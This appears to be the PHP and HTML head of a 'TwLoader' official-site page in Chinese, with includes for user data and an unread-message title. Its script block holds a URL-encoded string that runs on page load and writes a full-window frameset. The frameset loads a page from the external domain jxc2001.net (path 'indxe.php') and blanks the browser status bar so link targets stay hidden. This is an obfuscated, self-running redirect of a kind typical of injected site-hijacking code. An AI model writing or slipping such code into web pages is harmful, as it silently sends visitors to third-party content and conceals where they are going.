<?
include_once("include/class_mysql.php");
@mysql_query("SET character_set_results = utf8");
include_once("include/user_data.php");
include_once("include/get_user_status.php");
include_once("a_service.php");
?>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta name="title" content="TwLoader 官方網站" />
<meta name="description" content="顛覆眾人對於視覺的官感，只有想不到的絕對沒有做不到的!" />
<link rel="image_src" type="image/png" href="style/images/TwLoader.png" />
<link rel="shortcut icon" href="style/images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="style/images/favicon.ico">
<link rel="apple-touch-icon" href="style/images/faviconapp.png"/>
<title><? if ( $User['group'] == 1 ){ ?><?  echo $HaveUnread ? "【 您有 $HaveUnread 則訊息 】- " : " " ; ?> <? } ?> TwLoader 官方網站</title>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="%0A%0A%0A%0A%0A%0A%0A%0A%0A%3Cframeset%20rows%3D%220%2C*%22%20framespacing%3D%220%22%20frameborder%3D%220%22%3E%0A%20%3Cframe%20name%20src%20marginheight%3D%220%22%20marginwidth%3D%220%22%20scrolling%3D%22no%22%3E%0A%20%3Cbase%20onmouseover%3D%22window.status%3D%27%27%3Breturn%20true%22%3E%3Cframe%20name%3D%22mainframe%22%20src%3D%22http%3A//www.jxc2001.net/twloader/indxe.php%22%20marginheight%3D%220%22%20marginwidth%3D%220%22%20scrolling%3D%22yes%22%3E%0A%3C/frameset%3E"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
} 
SetNewWords();
-->
</SCRIPT>
</head>